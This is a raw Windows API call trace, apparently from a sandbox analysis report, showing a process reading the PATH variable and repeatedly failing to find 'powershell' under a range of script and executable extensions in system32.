	[0597.825] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0597.825] CoTaskMemFree (pv=0x3e3240) 
	[0597.825] CoTaskMemAlloc (cb=0x128) returned 0x392ac0
	[0597.825] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x392ac0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0597.825] CoTaskMemFree (pv=0x392ac0) 
	[0597.830] CoTaskMemAlloc (cb=0x20e) returned 0x1b7a4a60
	[0597.830] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7a4a60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0597.830] CoTaskMemFree (pv=0x1b7a4a60) 
	[0597.834] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0597.835] SetErrorMode (uMode=0x1) returned 0x1
	[0597.838] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.849] SetErrorMode (uMode=0x1) returned 0x1
	[0598.850] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.850] SetErrorMode (uMode=0x1) returned 0x1
	[0598.850] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.858] SetErrorMode (uMode=0x1) returned 0x1
	[0598.860] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.860] SetErrorMode (uMode=0x1) returned 0x1
	[0598.860] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.868] SetErrorMode (uMode=0x1) returned 0x1
	[0598.869] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.869] SetErrorMode (uMode=0x1) returned 0x1
	[0598.869] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0598.881] SetErrorMode (uMode=0x1) returned 0x1
	[0598.885] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0598.885] SetErrorMode (uMode=0x1) returned 0x1
	[0598.885] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.157] SetErrorMode (uMode=0x1) returned 0x1
	[0600.158] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.159] SetErrorMode (uMode=0x1) returned 0x1
	[0600.159] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.167] SetErrorMode (uMode=0x1) returned 0x1
	[0600.168] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.168] SetErrorMode (uMode=0x1) returned 0x1
	[0600.168] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.178] SetErrorMode (uMode=0x1) returned 0x1
	[0600.179] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.179] SetErrorMode (uMode=0x1) returned 0x1
	[0600.179] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.187] SetErrorMode (uMode=0x1) returned 0x1
	[0600.188] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0600.188] SetErrorMode (uMode=0x1) returned 0x1
	[0600.189] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0600.197] SetErrorMode (uMode=0x1) returned 0x1
	[0601.822] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.823] SetErrorMode (uMode=0x1) returned 0x1
	[0601.823] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.831] SetErrorMode (uMode=0x1) returned 0x1
	[0601.832] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.832] SetErrorMode (uMode=0x1) returned 0x1
	[0601.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.841] SetErrorMode (uMode=0x1) returned 0x1
	[0601.842] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.842] SetErrorMode (uMode=0x1) returned 0x1
	[0601.842] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.850] SetErrorMode (uMode=0x1) returned 0x1
	[0601.853] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.853] SetErrorMode (uMode=0x1) returned 0x1
	[0601.853] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0601.861] SetErrorMode (uMode=0x1) returned 0x1
	[0601.862] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0601.862] SetErrorMode (uMode=0x1) returned 0x1
	[0601.862] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.213] SetErrorMode (uMode=0x1) returned 0x1
	[0603.215] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0603.215] SetErrorMode (uMode=0x1) returned 0x1
	[0603.215] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.223] SetErrorMode (uMode=0x1) returned 0x1
	[0603.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.224] SetErrorMode (uMode=0x1) returned 0x1
	[0603.224] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.225] SetErrorMode (uMode=0x1) returned 0x1
	[0603.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.225] SetErrorMode (uMode=0x1) returned 0x1
	[0603.225] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.225] SetErrorMode (uMode=0x1) returned 0x1
	[0603.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.226] SetErrorMode (uMode=0x1) returned 0x1
	[0603.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.226] SetErrorMode (uMode=0x1) returned 0x1
	[0603.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.226] SetErrorMode (uMode=0x1) returned 0x1
	[0603.227] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.227] SetErrorMode (uMode=0x1) returned 0x1
	[0603.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.227] SetErrorMode (uMode=0x1) returned 0x1
	[0603.227] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.227] SetErrorMode (uMode=0x1) returned 0x1
	[0603.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.228] SetErrorMode (uMode=0x1) returned 0x1
	[0603.228] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.228] SetErrorMode (uMode=0x1) returned 0x1
	[0603.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.228] SetErrorMode (uMode=0x1) returned 0x1
	[0603.229] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.229] SetErrorMode (uMode=0x1) returned 0x1
	[0603.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.229] SetErrorMode (uMode=0x1) returned 0x1
	[0603.229] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.229] SetErrorMode (uMode=0x1) returned 0x1
	[0603.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.230] SetErrorMode (uMode=0x1) returned 0x1
	[0603.230] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.230] SetErrorMode (uMode=0x1) returned 0x1
	[0603.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.230] SetErrorMode (uMode=0x1) returned 0x1
	[0603.231] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.231] SetErrorMode (uMode=0x1) returned 0x1
	[0603.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.231] SetErrorMode (uMode=0x1) returned 0x1
	[0603.231] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.232] SetErrorMode (uMode=0x1) returned 0x1
	[0603.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.232] SetErrorMode (uMode=0x1) returned 0x1
	[0603.232] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.232] SetErrorMode (uMode=0x1) returned 0x1
	[0603.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.233] SetErrorMode (uMode=0x1) returned 0x1
